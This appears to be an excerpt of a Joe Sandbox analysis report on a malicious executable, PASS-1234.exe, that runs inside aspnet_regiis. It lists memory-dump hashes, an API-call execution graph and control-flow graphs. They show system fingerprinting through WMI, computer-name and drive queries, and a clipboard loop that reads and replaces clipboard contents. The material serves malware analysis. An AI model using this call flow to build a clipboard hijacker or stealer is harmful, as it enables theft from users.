                                                                                          • Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID: CodeInfoPageValid
                                                                                          • String ID: 3R9m
                                                                                          • API String ID: 546120528-2439373522
                                                                                          • Opcode ID: ceb9003efef3ca690856835552a5841bb88a3d4d5e846030590d650688e8c55d
                                                                                          • Instruction ID: 73f8a2fed124f10b71b0d56bbccf7c4ce7495b4910cf1fe51429a11413d868cb
                                                                                          • Opcode Fuzzy Hash: ceb9003efef3ca690856835552a5841bb88a3d4d5e846030590d650688e8c55d
                                                                                          • Instruction Fuzzy Hash: 775100709043469EEB118FB9C841AABBBF8FF99344F14816EC0E68F251F3769546CB94
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: C:\Users\user\Desktop\PASS-1234.exe
                                                                                          • API String ID: 0-221246543
                                                                                          • Opcode ID: df775f0236680030045b530ccf3a50f25745a692554a0d54564af86d2990b067
                                                                                          • Instruction ID: 3cc07ed9242dfb6fce36dc0167ba79ff0475ab117bfa4928a64d7bddb01e33a0
                                                                                          • Opcode Fuzzy Hash: df775f0236680030045b530ccf3a50f25745a692554a0d54564af86d2990b067
                                                                                          • Instruction Fuzzy Hash: 2A418671E04215AFDB22DB99C881AAFBBFDEF89310F154066E555EB240F7719A40CB50

                                                                                          Execution Graph

                                                                                          Execution Coverage:9.9%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:22.9%
                                                                                          Total number of Nodes:375
                                                                                          Total number of Limit Nodes:27
                                                                                          execution_graph 13609 317cd97 CoInitializeSecurity 13610 319c918 13612 319c950 13610->13612 13611 319c9db GetComputerNameExA 13612->13611 13612->13612 13671 31786d0 13673 31786df 13671->13673 13672 3178967 ExitProcess 13673->13672 13674 31786f4 GetCurrentProcessId GetCurrentThreadId 13673->13674 13684 3178959 13673->13684 13675 3178733 SHGetSpecialFolderPathW 13674->13675 13676 317872b 13674->13676 13678 3178810 13675->13678 13676->13675 13678->13678 13679 31abd70 RtlAllocateHeap 13678->13679 13680 317882d GetForegroundWindow 13679->13680 13682 317889f 13680->13682 13683 3178950 13682->13683 13685 317894b 13682->13685 13683->13684 13690 31ad780 13684->13690 13687 317b7c0 FreeLibrary 13685->13687 13688 317b7dc 13687->13688 13689 317b7e1 FreeLibrary 13688->13689 13689->13683 13693 31aee40 13690->13693 13692 31ad785 FreeLibrary 13692->13672 13694 31aee49 13693->13694 13694->13692 13695 319d150 13696 319d15a 13695->13696 13697 319d20a GetPhysicallyInstalledSystemMemory 13696->13697 13698 319d240 13697->13698 13698->13698 13699 31abdd0 13700 31abe00 13699->13700 13701 31abe4e 13700->13701 13709 31ad810 LdrInitializeThunk 13700->13709 13702 31abfe3 13701->13702 13704 31abd70 RtlAllocateHeap 13701->13704 13706 31abeaa 13704->13706 13705 31abd90 RtlFreeHeap 13705->13702 13708 31abf1e 13706->13708 13710 31ad810 LdrInitializeThunk 13706->13710 13708->13705 13709->13701 13710->13708 13613 31ad991 13614 31ad99a GetForegroundWindow 13613->13614 13615 31ad9ad 13614->13615 13711 31ade51 13712 31ade80 13711->13712 13712->13712 13714 31adede 13712->13714 13717 31ad810 LdrInitializeThunk 13712->13717 13716 31ad810 LdrInitializeThunk 13714->13716 13716->13714 13717->13714 13718 317df42 13722 3179770 13718->13722 13720 317df49 CoUninitialize 13721 317df70 13720->13721 13723 3179784 13722->13723 13723->13720 13724 31ae043 13725 31ae060 13724->13725 13727 31ae0be 13725->13727 13731 31ad810 LdrInitializeThunk 13725->13731 13730 31ad810 LdrInitializeThunk 13727->13730 13729 31ae196 13730->13729 13731->13727 13732 317d9ce 13733 317d9e0 13732->13733 13737 317da3e 13733->13737 13821 31ad810 LdrInitializeThunk 13733->13821 13734 317dace 13752 3193450 13734->13752 13737->13734 13822 31ad810 LdrInitializeThunk 13737->13822 13739 317db05 13766 3193a90 13739->13766 13741 317db21 13779 3193d50 13741->13779 13743 317db3d 13792 3196b60 13743->13792 13747 317db6b 13817 3199e60 13747->13817 13749 317db74 13750 31a2ff0 6 API calls 13749->13750 13751 317dbb5 13750->13751 13753 31934a0 13752->13753 13753->13753 13754 31934b4 RtlExpandEnvironmentStrings 13753->13754 13757 3193500 13754->13757 13755 3193540 13755->13739 13756 3193825 13827 31913d0 13756->13827 13757->13755 13757->13756 13758 3193690 13757->13758 13760 3193562 RtlExpandEnvironmentStrings 13757->13760 13761 3193596 13757->13761 13762 31937d1 GetLogicalDrives 13758->13762 13760->13755 13760->13756 13760->13758 13760->13761 13823 31b0b10 13761->13823 13764 31b0b10 LdrInitializeThunk 13762->13764 13764->13755 13765 3193681 13765->13755 13765->13756 13765->13758 13767 3193b30 13766->13767 13767->13767 13768 3193b83 RtlExpandEnvironmentStrings 13767->13768 13772 3193bd0 13768->13772 13769 3193d1c 13769->13741 13770 3193c56 13770->13770 13851 318f630 13770->13851 13772->13769 13772->13770 13773 3193f61 13772->13773 13776 3193c2d RtlExpandEnvironmentStrings 13772->13776 13855 31afd30 13772->13855 13865 31afa20 13773->13865 13776->13769 13776->13770 13776->13772 13776->13773 13780 3193d5e 13779->13780 13781 31af8e0 LdrInitializeThunk 13780->13781 13784 3193c16 13781->13784 13782 3193d1c 13782->13743 13783 31afd30 3 API calls 13783->13784 13784->13782 13784->13783 13785 3193c56 13784->13785 13786 3193f61 13784->13786 13790 3193c2d RtlExpandEnvironmentStrings 13784->13790 13787 318f630 3 API calls 13785->13787 13788 31afa20 3 API calls 13786->13788 13787->13782 13789 3193f92 13788->13789 13789->13782 13791 31af8e0 LdrInitializeThunk 13789->13791 13790->13782 13790->13784 13790->13785 13790->13786 13791->13782 13793 3196b80 13792->13793 13794 3196bfe 13793->13794 13884 31ad810 LdrInitializeThunk 13793->13884 13795 317db62 13794->13795 13797 31abd70 RtlAllocateHeap 13794->13797 13802 3196f10 13795->13802 13799 3196c86 13797->13799 13798 31abd90 RtlFreeHeap 13798->13795 13801 3196d1e 13799->13801 13885 31ad810 LdrInitializeThunk 13799->13885 13801->13798 13801->13801 13886 3196f30 13802->13886 13804 3196f24 13804->13747 13805 3196f19 13805->13804 13899 31a99b0 13805->13899 13807 31977dd 13807->13747 13808 31977b1 13808->13807 13809 3197965 13808->13809 13810 31b0950 LdrInitializeThunk 13808->13810 13906 31b0ce0 13809->13906 13810->13809 13812 31979b4 13812->13807 13815 31979e8 13812->13815 13910 31b0dd0 13812->13910 13815->13807 13815->13815 13916 31ad810 LdrInitializeThunk 13815->13916 13816 319819d 13818 3199ef0 13817->13818 13818->13818 13819 3199f11 RtlExpandEnvironmentStrings 13818->13819 13820 3199f60 13819->13820 13820->13820 13821->13737 13822->13734 13824 31b0b30 13823->13824 13824->13824 13825 31b0c8e 13824->13825 13842 31ad810 LdrInitializeThunk 13824->13842 13825->13765 13843 31b0950 13827->13843 13829 3191410 13830 31abd70 RtlAllocateHeap 13829->13830 13835 3191c01 13829->13835 13831 3191469 13830->13831 13840 31914e8 13831->13840 13847 31ad810 LdrInitializeThunk 13831->13847 13833 31abd90 RtlFreeHeap 13836 3191b82 13833->13836 13834 31abd70 RtlAllocateHeap 13834->13840 13835->13755 13836->13835 13849 31ad810 LdrInitializeThunk 13836->13849 13838 3191b70 13838->13833 13840->13834 13840->13838 13841 31abd90 RtlFreeHeap 13840->13841 13848 31ad810 LdrInitializeThunk 13840->13848 13841->13840 13842->13825 13844 31b0960 13843->13844 13845 31b0abe 13844->13845 13850 31ad810 LdrInitializeThunk 13844->13850 13845->13829 13847->13831 13848->13840 13849->13836 13850->13845 13852 318f660 13851->13852 13852->13852 13853 31913d0 3 API calls 13852->13853 13854 318f689 13853->13854 13854->13769 13857 31afd50 13855->13857 13856 31afdce 13856->13856 13858 31b009d 13856->13858 13860 31abd70 RtlAllocateHeap 13856->13860 13857->13856 13879 31ad810 LdrInitializeThunk 13857->13879 13858->13772 13861 31afe65 13860->13861 13864 31aff0e 13861->13864 13880 31ad810 LdrInitializeThunk 13861->13880 13862 31abd90 RtlFreeHeap 13862->13858 13864->13862 13866 31afa40 13865->13866 13868 31afabe 13866->13868 13881 31ad810 LdrInitializeThunk 13866->13881 13867 3193f92 13867->13769 13875 31af8e0 13867->13875 13868->13867 13870 31abd70 RtlAllocateHeap 13868->13870 13872 31afb40 13870->13872 13871 31afbee 13873 31abd90 RtlFreeHeap 13871->13873 13872->13871 13882 31ad810 LdrInitializeThunk 13872->13882 13873->13867 13877 31af900 13875->13877 13876 31af9ee 13876->13769 13877->13876 13883 31ad810 LdrInitializeThunk 13877->13883 13879->13856 13880->13864 13881->13868 13882->13871 13883->13876 13884->13794 13885->13801 13887 3196f70 13886->13887 13887->13887 13917 31abdd0 13887->13917 13891 3196fe2 13931 31ac170 13891->13931 13893 3196fd4 13893->13891 13898 31970f0 13893->13898 13935 31ac540 13893->13935 13897 3197153 13897->13805 13898->13897 13943 31ac490 13898->13943 13904 31a99e0 13899->13904 13900 31af8e0 LdrInitializeThunk 13900->13904 13901 31afd30 3 API calls 13901->13904 13902 31a9b18 13902->13808 13904->13900 13904->13901 13904->13902 13954 31b0440 13904->13954 13964 31ad810 LdrInitializeThunk 13904->13964 13908 31b0d00 13906->13908 13907 31b0d7e 13907->13812 13908->13907 13967 31ad810 LdrInitializeThunk 13908->13967 13912 31b0df0 13910->13912 13911 31b0f3e 13911->13815 13914 31b0e6e 13912->13914 13968 31ad810 LdrInitializeThunk 13912->13968 13914->13911 13969 31ad810 LdrInitializeThunk 13914->13969 13916->13816 13918 31abe00 13917->13918 13919 31abe4e 13918->13919 13947 31ad810 LdrInitializeThunk 13918->13947 13920 3196fc8 13919->13920 13922 31abd70 RtlAllocateHeap 13919->13922 13927 31ac020 13920->13927 13924 31abeaa 13922->13924 13923 31abd90 RtlFreeHeap 13923->13920 13926 31abf1e 13924->13926 13948 31ad810 LdrInitializeThunk 13924->13948 13926->13923 13928 31ac0ee 13927->13928 13929 31ac032 13927->13929 13928->13893 13929->13928 13949 31ad810 LdrInitializeThunk 13929->13949 13932 3196feb 13931->13932 13933 31ac17a 13931->13933 13932->13805 13933->13932 13950 31ad810 LdrInitializeThunk 13933->13950 13936 31ac590 13935->13936 13939 31ac5de 13936->13939 13951 31ad810 LdrInitializeThunk 13936->13951 13937 31acda8 13937->13893 13939->13937 13940 31acd3c 13939->13940 13942 31ad810 LdrInitializeThunk 13939->13942 13940->13937 13952 31ad810 LdrInitializeThunk 13940->13952 13942->13939 13944 31ac4b0 13943->13944 13946 31ac50e 13944->13946 13953 31ad810 LdrInitializeThunk 13944->13953 13946->13898 13947->13919 13948->13926 13949->13928 13950->13932 13951->13939 13952->13937 13953->13946 13955 31b0451 13954->13955 13957 31b057e 13955->13957 13965 31ad810 LdrInitializeThunk 13955->13965 13956 31b0778 13956->13904 13957->13956 13959 31abd70 RtlAllocateHeap 13957->13959 13960 31b05f0 13959->13960 13963 31b06be 13960->13963 13966 31ad810 LdrInitializeThunk 13960->13966 13961 31abd90 RtlFreeHeap 13961->13956 13963->13961 13964->13904 13965->13957 13966->13963 13967->13907 13968->13914 13969->13911 13970 3183942 13971 318394f 13970->13971 13972 318396c CreateThread 13971->13972 13973 3183b19 13972->13973 13975 31839ad 13972->13975 13974 31abd90 RtlFreeHeap 13973->13974 13976 3183df2 13974->13976 13979 3183a3b 13975->13979 13980 31ad810 LdrInitializeThunk 13975->13980 13979->13973 13981 31ad810 LdrInitializeThunk 13979->13981 13980->13975 13981->13979 13982 31b0440 13983 31b0451 13982->13983 13985 31b057e 13983->13985 13992 31ad810 LdrInitializeThunk 13983->13992 13984 31b0778 13985->13984 13987 31abd70 RtlAllocateHeap 13985->13987 13988 31b05f0 13987->13988 13991 31b06be 13988->13991 13993 31ad810 LdrInitializeThunk 13988->13993 13989 31abd90 RtlFreeHeap 13989->13984 13991->13989 13992->13985 13993->13991 13994 317cbf6 CoInitializeEx CoInitializeEx 13616 317ab30 13619 317ab60 13616->13619 13617 317afa8 13619->13617 13619->13619 13620 31abd90 13619->13620 13621 31abdbb RtlFreeHeap 13620->13621 13622 31abda3 13620->13622 13623 31abda5 13620->13623 13621->13617 13622->13617 13623->13621 13624 319ebbe CoSetProxyBlanket 13995 317d37f 13996 317d3a0 13995->13996 13999 31a88e0 13996->13999 13998 317d4e6 13998->13998 14003 31a8910 CoCreateInstance 13999->14003 14001 31a8b0e SysAllocString 14006 31a8bae 14001->14006 14002 31a904c 14005 31a905c GetVolumeInformationW 14002->14005 14003->14001 14003->14002 14013 31a9077 14005->14013 14007 31a9038 SysFreeString 14006->14007 14008 31a8bb6 CoSetProxyBlanket 14006->14008 14007->14002 14009 31a902e 14008->14009 14010 31a8bd6 SysAllocString 14008->14010 14009->14007 14012 31a8cb0 14010->14012 14012->14012 14014 31a8cf2 SysAllocString 14012->14014 14013->13998 14017 31a8d1a 14014->14017 14015 31a901c SysFreeString SysFreeString 14015->14009 14016 31a900b 14016->14015 14017->14015 14017->14016 14018 31a8d68 VariantInit 14017->14018 14020 31a8dc0 14018->14020 14019 31a8ffa VariantClear 14019->14016 14020->14019 13625 31a41b0 13626 31a41b5 13625->13626 13627 31a41eb GetSystemMetrics GetSystemMetrics 13626->13627 13628 31a422a 13627->13628 14021 31ada70 14022 31adab0 14021->14022 14022->14022 14023 31addbe 14022->14023 14025 31ad810 LdrInitializeThunk 14022->14025 14025->14023 14026 5711000 14027 5711102 14026->14027 14028 5711012 14026->14028 14029 5711030 Sleep 14028->14029 14030 571103a OpenClipboard 14028->14030 14029->14028 14031 57110f9 GetClipboardSequenceNumber 14030->14031 14032 571104a GetClipboardData 14030->14032 14031->14028 14033 57110f3 CloseClipboard 14032->14033 14034 571105a GlobalLock 14032->14034 14033->14031 14034->14033 14035 571106b GlobalAlloc 14034->14035 14037 57110e9 GlobalUnlock 14035->14037 14038 571109d GlobalLock 14035->14038 14037->14033 14039 57110b0 14038->14039 14040 57110b9 GlobalUnlock 14039->14040 14041 57110e0 GlobalFree 14040->14041 14042 57110cb EmptyClipboard SetClipboardData 14040->14042 14041->14037 14042->14037 14042->14041 13634 317d625 13636 317d680 13634->13636 13635 317d6de 13636->13635 13638 31ad810 LdrInitializeThunk 13636->13638 13638->13635 14043 31a3d6f 14044 31a3d74 14043->14044 14047 31a4330 14044->14047 14048 31a436d GetObjectW 14047->14048 14050 31a447f 14048->14050 13639 31927af 13640 3192857 13639->13640 13641 31927c6 13639->13641 13644 3192852 13641->13644 13645 31ad810 LdrInitializeThunk 13641->13645 13644->13640 13646 31ad810 LdrInitializeThunk 13644->13646 13645->13644 13646->13644 14051 319e5ef 14053 319e5f3 14051->14053 14052 319e6bb GetComputerNameExA 14054 319e6f4 14052->14054 14053->14052 14053->14053 14054->14054 14055 3190fe0 14056 3190fee 14055->14056 14059 3191040 14055->14059 14061 3191100 14056->14061 14058 31910bc 14058->14059 14060 318f690 RtlAllocateHeap RtlFreeHeap RtlReAllocateHeap LdrInitializeThunk 14058->14060 14060->14059 14062 3191110 14061->14062 14062->14062 14063 31b0b10 LdrInitializeThunk 14062->14063 14064 31911ff 14063->14064 13648 31ad7a0 13649 31ad7da 13648->13649 13650 31ad7b8 13648->13650 13651 31ad7e5 13648->13651 13652 31ad7c6 13648->13652 13656 31ad7e0 13648->13656 13657 31abd70 13649->13657 13650->13651 13650->13652 13650->13656 13654 31abd90 RtlFreeHeap 13651->13654 13655 31ad7cb RtlReAllocateHeap 13652->13655 13654->13656 13655->13656 13660 31aee60 13657->13660 13659 31abd7a RtlAllocateHeap 13659->13656 13661 31aee70 13660->13661 13661->13659 13661->13661 14065 31a86e0 14066 31a8700 14065->14066 14069 31a879e 14066->14069 14074 31ad810 LdrInitializeThunk 14066->14074 14068 31a881e 14071 31a887e 14068->14071 14075 31ad810 LdrInitializeThunk 14068->14075 14069->14068 14069->14071 14073 31ad810 LdrInitializeThunk 14069->14073 14073->14068 14074->14069 14075->14071 13662 3192e22 13663 319308d 13662->13663 13665 3192ec0 13662->13665 13665->13663 13666 31ad810 LdrInitializeThunk 13665->13666 13666->13665 13667 31a7321 13669 31a7345 13667->13669 13668 31a7353 GetUserDefaultUILanguage 13670 31a7388 13668->13670 13669->13668 14076 31ae1e1 14078 31ae210 14076->14078 14077 31ae26e 14078->14077 14080 31ad810 LdrInitializeThunk 14078->14080 14080->14077

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 0 31a88e0-31a8904 1 31a8910-31a8948 0->1 1->1 2 31a894a-31a895f 1->2 3 31a8960-31a897a 2->3 3->3 4 31a897c-31a89ba 3->4 5 31a89c0-31a89f0 4->5 5->5 6 31a89f2-31a8a13 5->6 8 31a8a19-31a8a22 6->8 9 31a8ab4-31a8b08 CoCreateInstance 6->9 12 31a8a30-31a8a49 8->12 10 31a8b0e-31a8b47 9->10 11 31a904c-31a9075 call 31af260 GetVolumeInformationW 9->11 13 31a8b50-31a8b7f 10->13 19 31a907f-31a9081 11->19 20 31a9077-31a907b 11->20 12->12 15 31a8a4b-31a8a63 12->15 13->13 16 31a8b81-31a8bb0 SysAllocString 13->16 18 31a8a70-31a8aa5 15->18 26 31a9038-31a9048 SysFreeString 16->26 27 31a8bb6-31a8bd0 CoSetProxyBlanket 16->27 18->18 21 31a8aa7-31a8aac 18->21 22 31a90a1-31a90a8 19->22 20->19 21->9 24 31a90aa-31a90b1 22->24 25 31a90c1-31a90d7 22->25 24->25 28 31a90b3-31a90bf 24->28 29 31a90e0-31a9114 25->29 26->11 30 31a902e-31a9034 27->30 31 31a8bd6-31a8beb 27->31 28->25 29->29 32 31a9116-31a915f 29->32 30->26 33 31a8bf0-31a8c2b 31->33 34 31a9160-31a91d6 32->34 33->33 35 31a8c2d-31a8ca6 SysAllocString 33->35 34->34 36 31a91d8-31a921f call 318e430 34->36 37 31a8cb0-31a8cf0 35->37 41 31a9220-31a922b 36->41 37->37 39 31a8cf2-31a8d26 SysAllocString 37->39 44 31a901c-31a902c SysFreeString * 2 39->44 45 31a8d2c-31a8d4e 39->45 41->41 43 31a922d-31a9239 41->43 46 31a923f-31a924f call 31780f0 43->46 47 31a9090-31a909b 43->47 44->30 51 31a900b-31a9015 45->51 52 31a8d54-31a8d57 45->52 46->47 47->22 48 31a9254-31a925b 47->48 51->44 52->51 54 31a8d5d-31a8d62 52->54 54->51 55 31a8d68-31a8db3 VariantInit 54->55 57 31a8dc0-31a8ddd 55->57 57->57 58 31a8ddf-31a8ded 57->58 59 31a8df1-31a8df6 58->59 60 31a8ffa-31a9007 VariantClear 59->60 61 31a8dfc-31a8e02 59->61 60->51 61->60 62 31a8e08-31a8e12 61->62 63 31a8e53 62->63 64 31a8e14-31a8e19 62->64 65 31a8e55-31a8e6d call 3178070 63->65 66 31a8e2c-31a8e30 64->66 75 31a8fa9-31a8fba 65->75 76 31a8e73-31a8e7d 65->76 68 31a8e32-31a8e3d 66->68 69 31a8e20 66->69 72 31a8e3f-31a8e44 68->72 73 31a8e46-31a8e4c 68->73 71 31a8e21-31a8e2a 69->71 71->65 71->66 72->71 73->71 74 31a8e4e-31a8e51 73->74 74->71 78 31a8fbc 75->78 79 31a8fc1-31a8fcd 75->79 76->75 77 31a8e83-31a8e8b 76->77 80 31a8e90-31a8e9e 77->80 78->79 81 31a8fcf 79->81 82 31a8fd4-31a8ff7 call 31780a0 call 3178080 79->82 83 31a8eb0-31a8eb6 80->83 84 31a8ea0-31a8ea9 80->84 81->82 82->60 87 31a8eb8-31a8ebb 83->87 88 31a8edc-31a8eea 83->88 86 31a8f40-31a8f4e 84->86 90 31a8f50-31a8f56 86->90 87->88 91 31a8ebd-31a8eda 87->91 92 31a8eec-31a8eef 88->92 93 31a8f62-31a8f6b 88->93 90->75 96 31a8f58-31a8f5a 90->96 91->86 92->93 99 31a8ef1-31a8f39 92->99 97 31a8f6d-31a8f71 93->97 98 31a8f73-31a8f7a 93->98 96->80 100 31a8f60 96->100 97->90 101 31a8f7c-31a8fa3 98->101 102 31a8fa5-31a8fa7 98->102 99->86 100->75 101->86 102->86
                                                                                          APIs
                                                                                          • CoCreateInstance.OLE32(031B3698,00000000,00000001,031B3688,00000000), ref: 031A8B00
                                                                                          • SysAllocString.OLEAUT32(FFA1FDAE), ref: 031A8B86
                                                                                          • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 031A8BC8
                                                                                          • SysAllocString.OLEAUT32(924C9C34), ref: 031A8C32
                                                                                          • SysAllocString.OLEAUT32(C18DC795), ref: 031A8CF7
                                                                                          • VariantInit.OLEAUT32(3D3C43BA), ref: 031A8D6D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocString$BlanketCreateInitInstanceProxyVariant
                                                                                          • String ID: \$k_XY$xyz{
                                                                                          • API String ID: 65563702-3857921785
                                                                                          • Opcode ID: 25d422530d67ab76e4fab80278b1d2ab0e0a2ef2890763aca91522049ec2bfd0
                                                                                          • Instruction ID: 59a1ef4c14ed51500e0d1bda05b54029cfbc5ebb9c65a83009d211da7bac9578
                                                                                          • Opcode Fuzzy Hash: 25d422530d67ab76e4fab80278b1d2ab0e0a2ef2890763aca91522049ec2bfd0
                                                                                          • Instruction Fuzzy Hash: F4423476A087418FD714CF28C88179BBBE6EFC8310F198A2CE5959B391D734D946CB92

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 103 3193450-319349f 104 31934a0-31934b2 103->104 104->104 105 31934b4-31934f5 RtlExpandEnvironmentStrings 104->105 106 3193500-3193512 105->106 106->106 107 3193514-319351c 106->107 108 3193589-3193594 call 3178080 107->108 109 3193548-3193554 107->109 110 31937f8-3193802 107->110 111 319380a 107->111 112 3193581 107->112 113 3193540 107->113 114 31936a0-31936a9 107->114 115 3193690-3193697 107->115 116 3193523-3193529 107->116 117 3193825-31938cf 107->117 118 3193596-319359f 107->118 108->109 110->111 112->108 113->109 123 31936ab-31936b0 114->123 124 31936b2 114->124 115->114 125 319352b-3193530 116->125 126 3193555 116->126 119 31938d0-3193907 117->119 121 31935a8 118->121 122 31935a1-31935a6 118->122 119->119 128 3193909-3193919 call 31913d0 119->128 130 31935af-31935eb call 3178070 121->130 122->130 131 31936b9-319375f call 3178070 123->131 124->131 127 319355c-319357a call 3178070 RtlExpandEnvironmentStrings 125->127 126->127 127->108 127->109 127->110 127->111 127->112 127->114 127->115 127->117 127->118 142 3193929-3193946 127->142 143 3193810-3193816 call 3178080 127->143 138 319391e-3193921 128->138 140 31935f0-319361e 130->140 141 3193760-319377b 131->141 138->142 140->140 145 3193620-3193628 140->145 141->141 146 319377d-3193785 141->146 147 3193950-3193972 142->147 161 319381f 143->161 149 319362a-319362f 145->149 150 3193641-319364d 145->150 151 31937a1-31937ad 146->151 152 3193787-319378f 146->152 147->147 153 3193974-31939f7 147->153 154 3193630-319363f 149->154 155 319364f-3193653 150->155 156 3193671-319367c call 31b0b10 150->156 158 31937af-31937b3 151->158 159 31937d1-31937f1 GetLogicalDrives call 31b0b10 151->159 157 3193790-319379f 152->157 160 3193a00-3193a25 153->160 154->150 154->154 162 3193660-319366f 155->162 167 3193681-3193689 156->167 157->151 157->157 164 31937c0-31937cf 158->164 159->110 159->111 159->142 159->143 159->161 171 3193a58-3193a5e call 3178080 159->171 172 3193a52 159->172 173 3193a67 159->173 160->160 166 3193a27-3193a4a call 3191270 160->166 162->156 162->162 164->159 164->164 166->172 167->110 167->111 167->114 167->115 167->117 167->142 167->143 167->161 167->171 167->172 167->173 171->173
                                                                                          APIs
                                                                                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 031934E6
                                                                                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 0319356F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd
                                                                                          Similarity
                                                                                          • API ID: EnvironmentExpandStrings
                                                                                          • String ID: Hi+k$QU$Y$pD$ps$z{${y$uw$y{
                                                                                          • API String ID: 237503144-3059748046
                                                                                          • Opcode ID: be31e1e6d272697f5d01b8e7e15ad825648acfd39c8a625041b24f96d5413cdf
                                                                                          • Instruction ID: 3288d09abf94c231c779b48280e38a9225a4c2606fabc131eb14724c34ebde64
                                                                                          • Opcode Fuzzy Hash: be31e1e6d272697f5d01b8e7e15ad825648acfd39c8a625041b24f96d5413cdf
                                                                                          • Instruction Fuzzy Hash: 98E1D8B81083408FE714DF25D89166BBBF5EF8A754F08892DE4E58B391E378C54ACB52

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • Sleep.KERNELBASE(00000001), ref: 05711032
                                                                                          • OpenClipboard.USER32(00000000), ref: 0571103C
                                                                                          • GetClipboardData.USER32(0000000D), ref: 0571104C
                                                                                          • GlobalLock.KERNEL32(00000000), ref: 0571105D
                                                                                          • GlobalAlloc.KERNEL32(00000002,-00000004), ref: 05711090
                                                                                          • GlobalLock.KERNEL32 ref: 057110A0
                                                                                          • GlobalUnlock.KERNEL32 ref: 057110C1
                                                                                          • EmptyClipboard.USER32 ref: 057110CB
                                                                                          • SetClipboardData.USER32(0000000D), ref: 057110D6
                                                                                          • GlobalFree.KERNEL32 ref: 057110E3
                                                                                          • GlobalUnlock.KERNEL32(?), ref: 057110ED
                                                                                          • CloseClipboard.USER32 ref: 057110F3
                                                                                          • GetClipboardSequenceNumber.USER32 ref: 057110F9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3390308113.0000000005711000.00000020.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3390287880.0000000005710000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3390327465.0000000005712000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_5710000_aspnet_regiis.jbxd
                                                                                          Similarity
                                                                                          • API ID: ClipboardGlobal$DataLockUnlock$AllocCloseEmptyFreeNumberOpenSequenceSleep
                                                                                          • String ID:
                                                                                          • API String ID: 1416286485-0
                                                                                          • Opcode ID: f6e04f6340f33499fe71c9012d15b13bf66a8f700b7b68da96a992cc5f9d09ad
                                                                                          • Instruction ID: d47ab9e1af36de68d712d7a87dff2700e264cc90773c1f6a398c85456ca8f3dd
                                                                                          • Opcode Fuzzy Hash: f6e04f6340f33499fe71c9012d15b13bf66a8f700b7b68da96a992cc5f9d09ad
                                                                                          • Instruction Fuzzy Hash: 81219B35A183509BD7206B7E9C0EB6ABFA8FF04741F458424FE45DA151EF218800F769

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
